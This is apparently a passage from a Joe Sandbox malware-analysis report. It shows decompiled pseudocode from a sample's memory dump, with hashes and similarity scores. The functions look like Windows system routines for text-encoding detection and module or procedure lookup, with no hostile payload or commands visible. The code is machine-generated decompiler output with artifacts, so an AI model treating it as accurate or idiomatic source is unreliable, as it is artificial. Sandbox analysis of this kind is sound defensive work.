                            				signed int _t254;
                            				signed int _t255;
                            				signed int _t256;
                            				signed int _t257;
                            				unsigned int _t258;
                            				void* _t261;
                            
                            				_t213 = _a8;
                            				_t159 = 0;
                            				_v60 = 0;
                            				_t237 = _t213 >> 1;
                            				_t210 = 0;
                            				_t257 = 0;
                            				_v56 = 0;
                            				_v52 = 0;
                            				_v44 = 0;
                            				_v48 = 0;
                            				_v92 = 0;
                            				_v88 = 0;
                            				_v76 = 0;
                            				_v72 = 0;
                            				_v64 = 0;
                            				_v68 = 0;
                            				_v24 = 0;
                            				_v80 = 0;
                            				_v84 = 0;
                            				_v28 = 0;
                            				_v32 = 0;
                            				_v20 = 0;
                            				_v12 = 0;
                            				_v16 = 0;
                            				_v100 = _t237;
                            				if(_t237 > 0x100) {
                            					_t254 = 0x100;
                            					_v36 = 0x100;
                            					L2:
                            					_t261 = _t213 - 2;
                            					if(_t261 == 0) {
                            						_t214 = _a4;
                            						_t160 =  *_t214 & 0x0000ffff;
                            						__eflags = _t160;
                            						if(_t160 == 0) {
                            							L108:
                            							_t159 = 0;
                            							L8:
                            							_t238 = 0;
                            							_v96 = 0;
                            							if(_t254 == 0) {
                            								L30:
                            								_v24 = _t159 - 1;
                            								goto L31;
                            							} else {
                            								goto L11;
                            								L13:
                            								_t224 = _t223 >> 8;
                            								_v40 = _t224;
                            								_t256 = _t224 & 0x000000ff;
                            								_t196 = _a4[_t238];
                            								_v5 = _t196;
                            								_t197 = _t196 & 0x000000ff;
                            								if(_t197 == 0xd) {
                            									__eflags = _t257 - 0xa;
                            									if(_t257 == 0xa) {
                            										_v12 = _v12 + 1;
                            									}
                            								} else {
                            									if(_t197 == 0xa) {
                            										__eflags = _t257 - 0xd;
                            										if(_t257 == 0xd) {
                            											_v12 = _v12 + 1;
                            										}
                            									}
                            								}
                            								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
                            								if(_t256 > _t257) {
                            									_t229 = _t256;
                            								} else {
                            									_t229 = _t257;
                            								}
                            								if(_t257 >= _t256) {
                            									_t257 = _t256;
                            								}
                            								_v28 = _v28 + _t229 - _t257;
                            								_t231 = _t197;
                            								if(_t197 <= _t210) {
                            									_t231 = _t210;
                            								}
                            								if(_t210 >= _t197) {
                            									_t210 = _t197;
                            								}
                            								_v32 = _v32 + _t231 - _t210;
                            								_t238 = _v96 + 1;
                            								_t210 = _t197;
                            								_t257 = _t256;
                            								_v96 = _t238;
                            								if(_t238 < _v36) {
                            									_t214 = _a4;
                            									L11:
                            									_t223 = _t214[_t238] & 0x0000ffff;
                            									_t193 = _t223 & 0x0000ffff;
                            									if(_t193 >= 0x900 || _t193 < 0x21) {
                            										goto L58;
                            									} else {
                            										goto L13;
                            									}
                            								}
                            								_t198 = _v5;
                            								if(_t198 == 0xd) {
                            									_t199 = _v40;
                            									__eflags = _t199 - 0xa;
                            									if(_t199 != 0xa) {
                            										L27:
                            										_t233 = _v12;
                            										L28:
                            										if(_t199 != 0) {
                            											__eflags = _t199 - 0x1a;
                            											if(_t199 == 0x1a) {
                            												_v12 = _t233 + 1;
                            											}
                            											L31:
                            											_t162 = _a8;
                            											if(_t162 > 0x200) {
                            												_t255 = 0x200;
                            											} else {
                            												_t255 = _t162;
                            											}
                            											_t215 =  *0x1806d59; // 0x0
                            											if(_t215 != 0) {
                            												_t239 = 0;
                            												__eflags = _t255;
                            												if(_t255 == 0) {
                            													goto L34;
                            												} else {
                            													goto L119;
                            												}
                            												do {
                            													L119:
                            													_t192 =  *(_a4 + _t239) & 0x000000ff;
                            													__eflags =  *((short*)(0x1806920 + _t192 * 2));
                            													_t163 = _v20;
                            													if( *((short*)(0x1806920 + _t192 * 2)) != 0) {
                            														_t163 = _t163 + 1;
                            														_t239 = _t239 + 1;
                            														__eflags = _t239;
                            														_v20 = _t163;
                            													}
                            													_t239 = _t239 + 1;
                            													__eflags = _t239 - _t255;
                            												} while (_t239 < _t255);
                            												goto L35;
                            											} else {
                            												L34:
                            												_t163 = 0;
                            												L35:
                            												_t240 = _v32;
                            												_t211 = _v28;
                            												if(_t240 < 0x7f) {
                            													__eflags = _t211;
                            													if(_t211 != 0) {
                            														L37:
                            														if(_t240 == 0) {
                            															_v16 = 0x10;
                            														}
                            														L38:
                            														_t258 = _a12;
                            														if(_t215 != 0) {
                            															__eflags = _t163;
                            															if(_t163 == 0) {
                            																goto L39;
                            															}
                            															__eflags = _t258;
                            															if(_t258 == 0) {
                            																goto L39;
                            															}
                            															__eflags =  *_t258 & 0x00000400;
                            															if(( *_t258 & 0x00000400) == 0) {
                            																goto L39;
                            															}
                            															_t218 = _v100;
                            															__eflags = _t218 - 0x100;
                            															if(_t218 > 0x100) {
                            																_t218 = 0x100;
                            															}
                            															_t220 = (_t218 >> 1) - 1;
                            															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
                            															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
                            																_t221 = _t220 + _t220;
                            																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
                            																asm("sbb ecx, ecx");
                            																_t216 =  ~_t221 + 1;
                            																__eflags = _t216;
                            															} else {
                            																_t216 = 3;
                            															}
                            															_v16 = _v16 | 0x00000400;
                            															_t240 = _v32;
                            															L40:
                            															if(_t211 * _t216 < _t240) {
                            																_v16 = _v16 | 0x00000002;
                            															}
                            															_t217 = _v16;
                            															if(_t240 * _t216 < _t211) {
                            																_t217 = _t217 | 0x00000020;
                            															}
                            															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
                            																_t217 = _t217 | 0x00000004;
                            															}
                            															if(_v64 + _v68 + _v72 + _v76 != 0) {
                            																_t217 = _t217 | 0x00000040;
                            															}
                            															if(_v80 + _v84 + _v88 + _v92 == 0) {
                            																_t212 = _v12;
                            																__eflags = _t212;
                            																if(_t212 == 0) {
                            																	goto L48;
                            																}
                            																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
                            																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
                            																	goto L47;
                            																}
                            																goto L48;
                            															} else {
                            																L47:
                            																_t217 = _t217 | 0x00000100;
                            																L48:
                            																if((_a8 & 0x00000001) != 0) {
                            																	_t217 = _t217 | 0x00000200;
                            																}
                            																if(_v24 != 0) {
                            																	_t217 = _t217 | 0x00001000;
                            																}
                            																_t180 =  *_a4 & 0x0000ffff;
                            																if(_t180 != 0xfeff) {
                            																	__eflags = _t180 - 0xfffe;
                            																	if(_t180 == 0xfffe) {
                            																		_t217 = _t217 | 0x00000080;
                            																	}
                            																} else {
                            																	_t217 = _t217 | 0x00000008;
                            																}
                            																if(_t258 != 0) {
                            																	 *_t258 =  *_t258 & _t217;
                            																	_t217 =  *_t258;
                            																}
                            																if((_t217 & 0x00000b08) != 8) {
                            																	__eflags = _t217 & 0x000000f0;
                            																	if((_t217 & 0x000000f0) != 0) {
                            																		L84:
                            																		return 0;
                            																	}
                            																	__eflags = _t217 & 0x00000f00;
                            																	if((_t217 & 0x00000f00) == 0) {
                            																		__eflags = _t217 & 0x0000f00f;
                            																		if((_t217 & 0x0000f00f) == 0) {
                            																			goto L84;
                            																		}
                            																		goto L56;
                            																	}
                            																	goto L84;
                            																} else {
                            																	L56:
                            																	return 1;
                            																}
                            															}
                            														}
                            														L39:
                            														_t216 = 3;
                            														goto L40;
                            													}
                            													_v16 = 1;
                            													goto L38;
                            												}
                            												if(_t211 == 0) {
                            													goto L38;
                            												}
                            												goto L37;
                            											}
                            										} else {
                            											_t159 = _v24;
                            											goto L30;
                            										}
                            									}
                            									L104:
                            									_t233 = _v12 + 1;
                            									_v12 = _t233;
                            									goto L28;
                            								}
                            								_t199 = _v40;
                            								if(_t198 != 0xa || _t199 != 0xd) {
                            									goto L27;
                            								} else {
                            									goto L104;
                            								}
                            								L58:
                            								__eflags = _t193 - 0x3001;
                            								if(_t193 < 0x3001) {
                            									L60:
                            									__eflags = _t193 - 0xd00;
                            									if(__eflags > 0) {
                            										__eflags = _t193 - 0x3000;
                            										if(__eflags > 0) {
                            											_t194 = _t193 - 0xfeff;
                            											__eflags = _t194;
                            											if(_t194 != 0) {
                            												_t200 = _t194 - 0xff;
                            												__eflags = _t200;
                            												if(_t200 == 0) {
                            													_v88 = _v88 + 1;
                            												} else {
                            													__eflags = _t200 == 1;
                            													if(_t200 == 1) {
                            														_v92 = _v92 + 1;
                            													}
                            												}
                            											}
                            										} else {
                            											if(__eflags == 0) {
                            												_v48 = _v48 + 1;
                            											} else {
                            												_t202 = _t193 - 0x2000;
                            												__eflags = _t202;
                            												if(_t202 == 0) {
                            													_v68 = _v68 + 1;
                            												}
                            											}
                            										}
                            										goto L13;
                            									}
                            									if(__eflags == 0) {
                            										_v76 = _v76 + 1;
                            										goto L13;
                            									}
                            									__eflags = _t193 - 0x20;
                            									if(__eflags > 0) {
                            										_t204 = _t193 - 0x900;
                            										__eflags = _t204;
                            										if(_t204 == 0) {
                            											_v64 = _v64 + 1;
                            										} else {
                            											_t205 = _t204 - 0x100;
                            											__eflags = _t205;
                            											if(_t205 == 0) {
                            												_v72 = _v72 + 1;
                            											} else {
                            												__eflags = _t205 == 0xd;
                            												if(_t205 == 0xd) {
                            													_v84 = _v84 + 1;
                            												}
                            											}
                            										}
                            										goto L13;
                            									}
                            									if(__eflags == 0) {
                            										_v44 = _v44 + 1;
                            										goto L13;
                            									}
                            									__eflags = _t193 - 0xd;
                            									if(_t193 > 0xd) {
                            										goto L13;
                            									}
                            									_t84 = _t193 + 0x1711174; // 0x4040400
                            									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M01711160))) {
                            										case 0:
                            											_v80 = _v80 + 1;
                            											goto L13;
                            										case 1:
                            											_v52 = _v52 + 1;
                            											goto L13;
                            										case 2:
                            											_v56 = _v56 + 1;
                            											goto L13;
                            										case 3:
                            											_v60 = _v60 + 1;
                            											goto L13;
                            										case 4:
                            											goto L13;
                            									}
                            								}
                            								__eflags = _t193 - 0xfeff;
                            								if(_t193 < 0xfeff) {
                            									goto L13;
                            								}
                            								goto L60;
                            							}
                            						}
                            						__eflags = _t160 >> 8;
                            						if(_t160 >> 8 == 0) {
                            							L101:
                            							_t209 = _a12;
                            							__eflags = _t209;
                            							if(_t209 != 0) {
                            								 *_t209 = 5;
                            							}
                            							goto L84;
                            						}
                            						goto L108;
                            					}
                            					if(_t261 <= 0 || _t237 > 0x100) {
                            						_t214 = _a4;
                            					} else {
                            						_t214 = _a4;
                            						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
                            							_t254 = _t254 - 1;
                            							_v36 = _t254;
                            						}
                            					}
                            					goto L8;
                            				}
                            				_t254 = _t237;
                            				_v36 = _t254;
                            				if(_t254 == 0) {
                            					goto L101;
                            				}
                            				goto L2;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b6f5294caf47310ae3e3904a2cc0b508314b13cfd0dd8fa792cb2ca03d889deb
                            • Instruction ID: f6a5544dc614f1b64e4399f659804b734bee44f6cb980cc843e328d294a7addd
                            • Opcode Fuzzy Hash: b6f5294caf47310ae3e3904a2cc0b508314b13cfd0dd8fa792cb2ca03d889deb
                            • Instruction Fuzzy Hash: FAD1C231E042598BEF28CEADC5953BDFBB5FB48300F548169EA42AB28DD77489C5CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E0172D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                            				signed int _v8;
                            				intOrPtr _v20;
                            				signed int _v36;
                            				intOrPtr* _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				signed char _v52;
                            				signed int _v60;
                            				signed int _v64;
                            				signed int _v68;
                            				signed int _v72;
                            				signed int _v76;
                            				intOrPtr _v80;
                            				signed int _v84;
                            				intOrPtr _v100;
                            				intOrPtr _v104;
                            				signed int _v108;
                            				signed int _v112;
                            				signed int _v116;
                            				intOrPtr _v120;
                            				signed int _v132;
                            				char _v140;
                            				char _v144;
                            				char _v157;
                            				signed int _v164;
                            				signed int _v168;
                            				signed int _v169;
                            				intOrPtr _v176;
                            				signed int _v180;
                            				signed int _v184;
                            				intOrPtr _v188;
                            				signed int _v192;
                            				signed int _v200;
                            				signed int _v208;
                            				intOrPtr* _v212;
                            				char _v216;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t204;
                            				void* _t208;
                            				signed int _t211;
                            				signed int _t216;
                            				intOrPtr _t217;
                            				intOrPtr* _t218;
                            				signed int _t226;
                            				signed int _t239;
                            				signed int* _t247;
                            				signed int _t249;
                            				void* _t252;
                            				signed int _t256;
                            				signed int _t269;
                            				signed int _t271;
                            				signed int _t277;
                            				signed int _t279;
                            				intOrPtr _t283;
                            				signed int _t287;
                            				signed int _t288;
                            				void* _t289;
                            				signed char _t290;
                            				signed int _t292;
                            				signed int* _t293;
                            				signed int _t306;
                            				signed int _t307;
                            				signed int _t308;
                            				signed int _t309;
                            				signed int _t310;
                            				intOrPtr _t311;
                            				intOrPtr _t312;
                            				signed int _t319;
                            				signed int _t320;
                            				signed int* _t324;
                            				signed int _t337;
                            				signed int _t338;
                            				signed int _t339;
                            				signed int* _t340;
                            				void* _t341;
                            				signed int _t344;
                            				signed int _t348;
                            				signed int _t349;
                            				signed int _t351;
                            				intOrPtr _t353;
                            				void* _t354;
                            				signed int _t356;
                            				signed int _t358;
                            				intOrPtr _t359;
                            				signed int _t363;
                            				signed short* _t365;
                            				void* _t367;
                            				intOrPtr _t369;
                            				void* _t370;
                            				signed int _t371;
                            				signed int _t372;
                            				void* _t374;
                            				signed int _t376;
                            				void* _t384;
                            				signed int _t387;
                            
                            				_v8 =  *0x180d360 ^ _t376;
                            				_t2 =  &_a20;
                            				 *_t2 = _a20 & 0x00000001;
                            				_t287 = _a4;
                            				_v200 = _a12;
                            				_t365 = _a8;
                            				_v212 = _a16;
                            				_v180 = _a24;
                            				_v168 = 0;
                            				_v157 = 0;
                            				if( *_t2 != 0) {
                            					__eflags = L01726600(0x18052d8);
                            					if(__eflags == 0) {
                            						goto L1;
                            					} else {
                            						_v188 = 6;
                            					}
                            				} else {
                            					L1:
                            					_v188 = 9;
                            				}
                            				if(_t365 == 0) {
                            					_v164 = 0;
                            					goto L5;
                            				} else {
                            					_t363 =  *_t365 & 0x0000ffff;
                            					_t341 = _t363 + 1;
                            					if((_t365[1] & 0x0000ffff) < _t341) {
                            						L109:
                            						__eflags = _t341 - 0x80;
                            						if(_t341 <= 0x80) {
                            							_t281 =  &_v140;
                            							_v164 =  &_v140;
                            							goto L114;
                            						} else {
                            							_t283 =  *0x1807b9c; // 0x0
                            							_t281 = L01734620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                            							_v164 = _t281;
                            							__eflags = _t281;
                            							if(_t281 != 0) {
                            								_v157 = 1;
                            								L114:
                            								E0175F3E0(_t281, _t365[2], _t363);
                            								_t200 = _v164;
                            								 *((char*)(_v164 + _t363)) = 0;
                            								goto L5;
                            							} else {
                            								_t204 = 0xc000009a;
                            								goto L47;
                            							}
                            						}
                            					} else {
                            						_t200 = _t365[2];
                            						_v164 = _t200;
                            						if( *((char*)(_t200 + _t363)) != 0) {
                            							goto L109;
                            						} else {
                            							while(1) {
                            								L5:
                            								_t353 = 0;
                            								_t342 = 0x1000;
                            								_v176 = 0;
                            								if(_t287 == 0) {
                            									break;
                            								}
                            								_t384 = _t287 -  *0x1807b90; // 0x77d30000
                            								if(_t384 == 0) {
                            									_t353 =  *0x1807b8c; // 0x1453d80
                            									_v176 = _t353;
                            									_t320 = ( *(_t353 + 0x50))[8];
                            									_v184 = _t320;
                            								} else {
                            									E01732280(_t200, 0x18084d8);
                            									_t277 =  *0x18085f4; // 0x1451f88
                            									_t351 =  *0x18085f8 & 1;
                            									while(_t277 != 0) {
                            										_t337 =  *(_t277 - 0x50);
                            										if(_t337 > _t287) {
                            											_t338 = _t337 | 0xffffffff;
                            										} else {
                            											asm("sbb ecx, ecx");
                            											_t338 =  ~_t337;
                            										}
                            										_t387 = _t338;
                            										if(_t387 < 0) {
                            											_t339 =  *_t277;
                            											__eflags = _t351;
                            											if(_t351 != 0) {
                            												__eflags = _t339;
                            												if(_t339 == 0) {
                            													goto L16;
                            												} else {
                            													goto L118;
                            												}
                            												goto L151;
                            											} else {
                            												goto L16;
                            											}
                            											goto L17;
                            										} else {
                            											if(_t387 <= 0) {
                            												__eflags = _t277;
                            												if(_t277 != 0) {
                            													_t340 =  *(_t277 - 0x18);
                            													_t24 = _t277 - 0x68; // 0x1451f20
                            													_t353 = _t24;
                            													_v176 = _t353;
                            													__eflags = _t340[3] - 0xffffffff;
                            													if(_t340[3] != 0xffffffff) {
                            														_t279 =  *_t340;
                            														__eflags =  *(_t279 - 0x20) & 0x00000020;
                            														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                            															asm("lock inc dword [edi+0x9c]");
                            															_t340 =  *(_t353 + 0x50);
                            														}
                            													}
                            													_v184 = _t340[8];
                            												}
                            											} else {
                            												_t339 =  *(_t277 + 4);
                            												if(_t351 != 0) {
                            													__eflags = _t339;
                            													if(_t339 == 0) {
                            														goto L16;
                            													} else {
                            														L118:
                            														_t277 = _t277 ^ _t339;
                            														goto L17;
                            													}
                            													goto L151;
                            												} else {
                            													L16:
                            													_t277 = _t339;
                            												}
                            												goto L17;
                            											}
                            										}
                            										goto L25;
                            										L17:
                            									}
                            									L25:
                            									L0172FFB0(_t287, _t353, 0x18084d8);
                            									_t320 = _v184;
                            									_t342 = 0x1000;
                            								}
                            								if(_t353 == 0) {
                            									break;
                            								} else {
                            									_t366 = 0;
                            									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                            										_t288 = _v164;
                            										if(_t353 != 0) {
                            											_t342 = _t288;
                            											_t374 = L0176CC99(_t353, _t288, _v200, 1,  &_v168);
                            											if(_t374 >= 0) {
                            												if(_v184 == 7) {
                            													__eflags = _a20;
                            													if(__eflags == 0) {
                            														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                            														if(__eflags != 0) {
                            															_t271 = L01726600(0x18052d8);
                            															__eflags = _t271;
                            															if(__eflags == 0) {
                            																_t342 = 0;
                            																_v169 = _t271;
                            																_t374 = E01727926( *(_t353 + 0x50), 0,  &_v169);
                            															}
                            														}
                            													}
                            												}
                            												if(_t374 < 0) {
                            													_v168 = 0;
                            												} else {
                            													if( *0x180b239 != 0) {
                            														_t342 =  *(_t353 + 0x18);
                            														E0179E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                            													}
                            													if( *0x1808472 != 0) {
                            														_v192 = 0;
                            														_t342 =  *0x7ffe0330;
                            														asm("ror edi, cl");
                            														 *0x180b1e0( &_v192, _t353, _v168, 0, _v180);
                            														 *( *0x180b218 ^  *0x7ffe0330)();
                            														_t269 = _v192;
                            														_t353 = _v176;
                            														__eflags = _t269;
                            														if(__eflags != 0) {
                            															_v168 = _t269;
                            														}
                            													}
                            												}
                            											}
                            											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                            												_t366 = 0xc000007a;
                            											}
                            											_t247 =  *(_t353 + 0x50);
                            											if(_t247[3] == 0xffffffff) {
                            												L40:
                            												if(_t366 == 0xc000007a) {
                            													__eflags = _t288;
                            													if(_t288 == 0) {
                            														goto L136;
                            													} else {
                            														_t366 = 0xc0000139;
                            													}
                            													goto L54;
                            												}
                            											} else {
                            												_t249 =  *_t247;
                            												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                            													goto L40;
                            												} else {
                            													_t250 = _t249 | 0xffffffff;
                            													asm("lock xadd [edi+0x9c], eax");
                            													if((_t249 | 0xffffffff) == 0) {
                            														E01732280(_t250, 0x18084d8);
                            														_t342 =  *(_t353 + 0x54);
                            														_t165 = _t353 + 0x54; // 0x54
                            														_t252 = _t165;
                            														__eflags =  *(_t342 + 4) - _t252;
                            														if( *(_t342 + 4) != _t252) {
                            															L135:
                            															asm("int 0x29");
                            															L136:
                            															_t288 = _v200;
                            															_t366 = 0xc0000138;
                            															L54:
                            															_t342 = _t288;
                            															L01753898(0, _t288, _t366);
                            														} else {
                            															_t324 =  *(_t252 + 4);
                            															__eflags =  *_t324 - _t252;
                            															if( *_t324 != _t252) {
                            																goto L135;
                            															} else {
                            																 *_t324 = _t342;
                            																 *(_t342 + 4) = _t324;
                            																_t293 =  *(_t353 + 0x50);
                            																_v180 =  *_t293;
                            																L0172FFB0(_t293, _t353, 0x18084d8);
                            																__eflags =  *((short*)(_t353 + 0x3a));
                            																if( *((short*)(_t353 + 0x3a)) != 0) {
                            																	_t342 = 0;
                            																	__eflags = 0;
                            																	L017537F5(_t353, 0);
                            																}
                            																L01750413(_t353);
                            																_t256 =  *(_t353 + 0x48);
                            																__eflags = _t256;
                            																if(_t256 != 0) {
                            																	__eflags = _t256 - 0xffffffff;
                            																	if(_t256 != 0xffffffff) {
                            																		E01749B10(_t256);
                            																	}
                            																}
                            																__eflags =  *(_t353 + 0x28);
                            																if( *(_t353 + 0x28) != 0) {
                            																	_t174 = _t353 + 0x24; // 0x24
                            																	E017402D6(_t174);
                            																}
                            																L017377F0( *0x1807b98, 0, _t353);
                            																__eflags = _v180 - _t293;
                            																if(__eflags == 0) {
                            																	E0174C277(_t293, _t366);
                            																}
                            																_t288 = _v164;
                            																goto L40;
                            															}
                            														}
                            													} else {
                            														goto L40;
                            													}
                            												}
                            											}
                            										}
                            									} else {
                            										L0172EC7F(_t353);
                            										L017419B8(_t287, 0, _t353, 0);
                            										_t200 = L0171F4E3(__eflags);
                            										continue;
                            									}
                            								}
                            								L41:
                            								if(_v157 != 0) {
                            									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                            								}
                            								if(_t366 < 0 || ( *0x180b2f8 |  *0x180b2fc) == 0 || ( *0x180b2e4 & 0x00000001) != 0) {
                            									L46:
                            									 *_v212 = _v168;
                            									_t204 = _t366;
                            									L47:
                            									_pop(_t354);
                            									_pop(_t367);
                            									_pop(_t289);
                            									return L0175B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                            								} else {
                            									_v200 = 0;
                            									if(( *0x180b2ec >> 0x00000008 & 0x00000003) == 3) {
                            										_t355 = _v168;
                            										_t342 =  &_v208;
                            										_t208 = E017C6B68(_v168,  &_v208, _v168, __eflags);
                            										__eflags = _t208 - 1;
                            										if(_t208 == 1) {
                            											goto L46;
                            										} else {
                            											__eflags = _v208 & 0x00000010;
                            											if((_v208 & 0x00000010) == 0) {
                            												goto L46;
                            											} else {
                            												_t342 = 4;
                            												_t366 = E017C6AEB(_t355, 4,  &_v216);
                            												__eflags = _t366;
                            												if(_t366 >= 0) {
                            													goto L46;
                            												} else {
                            													asm("int 0x29");
                            													_t356 = 0;
                            													_v44 = 0;
                            													_t290 = _v52;
                            													__eflags = 0;
                            													if(0 == 0) {
                            														L108:
                            														_t356 = 0;
                            														_v44 = 0;
                            														goto L63;
                            													} else {
                            														__eflags = 0;
                            														if(0 < 0) {
                            															goto L108;
                            														}
                            														L63:
                            														_v112 = _t356;
                            														__eflags = _t356;
                            														if(_t356 == 0) {
                            															L143:
                            															_v8 = 0xfffffffe;
                            															_t211 = 0xc0000089;
                            														} else {
                            															_v36 = 0;
                            															_v60 = 0;
                            															_v48 = 0;
                            															_v68 = 0;
                            															_v44 = _t290 & 0xfffffffc;
                            															E0172E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                            															_t306 = _v68;
                            															__eflags = _t306;
                            															if(_t306 == 0) {
                            																_t216 = 0xc000007b;
                            																_v36 = 0xc000007b;
                            																_t307 = _v60;
                            															} else {
                            																__eflags = _t290 & 0x00000001;
                            																if(__eflags == 0) {
                            																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                            																	__eflags = _t349 - 0x10b;
                            																	if(_t349 != 0x10b) {
                            																		__eflags = _t349 - 0x20b;
                            																		if(_t349 == 0x20b) {
                            																			goto L102;
                            																		} else {
                            																			_t307 = 0;
                            																			_v48 = 0;
                            																			_t216 = 0xc000007b;
                            																			_v36 = 0xc000007b;
                            																			goto L71;
                            																		}
                            																	} else {
                            																		L102:
                            																		_t307 =  *(_t306 + 0x50);
                            																		goto L69;
                            																	}
                            																	goto L151;
                            																} else {
                            																	_t239 = L0172EAEA(_t290, _t290, _t356, _t366, __eflags);
                            																	_t307 = _t239;
                            																	_v60 = _t307;
                            																	_v48 = _t307;
                            																	__eflags = _t307;
                            																	if(_t307 != 0) {
                            																		L70:
                            																		_t216 = _v36;
                            																	} else {
                            																		_push(_t239);
                            																		_push(0x14);
                            																		_push( &_v144);
                            																		_push(3);
                            																		_push(_v44);
                            																		_push(0xffffffff);
                            																		_t319 = L01759730();
                            																		_v36 = _t319;
                            																		__eflags = _t319;
                            																		if(_t319 < 0) {
                            																			_t216 = 0xc000001f;
                            																			_v36 = 0xc000001f;
                            																			_t307 = _v60;
                            																		} else {
                            																			_t307 = _v132;
                            																			L69:
                            																			_v48 = _t307;
                            																			goto L70;
                            																		}
                            																	}
                            																}
                            															}
                            															L71:
                            															_v72 = _t307;
                            															_v84 = _t216;
                            															__eflags = _t216 - 0xc000007b;
                            															if(_t216 == 0xc000007b) {
                            																L150:
                            																_v8 = 0xfffffffe;
                            																_t211 = 0xc000007b;
                            															} else {
                            																_t344 = _t290 & 0xfffffffc;
                            																_v76 = _t344;
                            																__eflags = _v40 - _t344;
                            																if(_v40 <= _t344) {
                            																	goto L150;
                            																} else {
                            																	__eflags = _t307;
                            																	if(_t307 == 0) {
                            																		L75:
                            																		_t217 = 0;
                            																		_v104 = 0;
                            																		__eflags = _t366;
                            																		if(_t366 != 0) {
                            																			__eflags = _t290 & 0x00000001;
                            																			if((_t290 & 0x00000001) != 0) {
                            																				_t217 = 1;
                            																				_v104 = 1;
                            																			}
                            																			_t290 = _v44;
                            																			_v52 = _t290;
                            																		}
                            																		__eflags = _t217 - 1;
                            																		if(_t217 != 1) {
                            																			_t369 = 0;
                            																			_t218 = _v40;
                            																			goto L91;
                            																		} else {
                            																			_v64 = 0;
                            																			E0172E9C0(1, _t290, 0, 0,  &_v64);
                            																			_t309 = _v64;
                            																			_v108 = _t309;
                            																			__eflags = _t309;
                            																			if(_t309 == 0) {
                            																				goto L143;
                            																			} else {
                            																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                            																				__eflags = _t226 - 0x10b;
                            																				if(_t226 != 0x10b) {
                            																					__eflags = _t226 - 0x20b;
                            																					if(_t226 != 0x20b) {
                            																						goto L143;
                            																					} else {
                            																						_t371 =  *(_t309 + 0x98);
                            																						goto L83;
                            																					}
                            																				} else {
                            																					_t371 =  *(_t309 + 0x88);
                            																					L83:
                            																					__eflags = _t371;
                            																					if(_t371 != 0) {
                            																						_v80 = _t371 - _t356 + _t290;
                            																						_t310 = _v64;
                            																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                            																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                            																						_t311 = 0;
                            																						__eflags = 0;
                            																						while(1) {
                            																							_v120 = _t311;
                            																							_v116 = _t348;
                            																							__eflags = _t311 - _t292;
                            																							if(_t311 >= _t292) {
                            																								goto L143;
                            																							}
                            																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                            																							__eflags = _t371 - _t359;
                            																							if(_t371 < _t359) {
                            																								L98:
                            																								_t348 = _t348 + 0x28;
                            																								_t311 = _t311 + 1;
                            																								continue;
                            																							} else {
                            																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                            																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                            																									goto L98;
                            																								} else {
                            																									__eflags = _t348;
                            																									if(_t348 == 0) {
                            																										goto L143;
                            																									} else {
                            																										_t218 = _v40;
                            																										_t312 =  *_t218;
                            																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                            																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                            																											_v100 = _t359;
                            																											_t360 = _v108;
                            																											_t372 = L01728F44(_v108, _t312);
                            																											__eflags = _t372;
                            																											if(_t372 == 0) {
                            																												goto L143;
                            																											} else {
                            																												_t290 = _v52;
                            																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - L01753C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                            																												_t307 = _v72;
                            																												_t344 = _v76;
                            																												_t218 = _v40;
                            																												goto L91;
                            																											}
                            																										} else {
                            																											_t290 = _v52;
                            																											_t307 = _v72;
                            																											_t344 = _v76;
                            																											_t369 = _v80;
                            																											L91:
                            																											_t358 = _a4;
                            																											__eflags = _t358;
                            																											if(_t358 == 0) {
                            																												L95:
                            																												_t308 = _a8;
                            																												__eflags = _t308;
                            																												if(_t308 != 0) {
                            																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                            																												}
                            																												_v8 = 0xfffffffe;
                            																												_t211 = _v84;
                            																											} else {
                            																												_t370 =  *_t218 - _t369 + _t290;
                            																												 *_t358 = _t370;
                            																												__eflags = _t370 - _t344;
                            																												if(_t370 <= _t344) {
                            																													L149:
                            																													 *_t358 = 0;
                            																													goto L150;
                            																												} else {
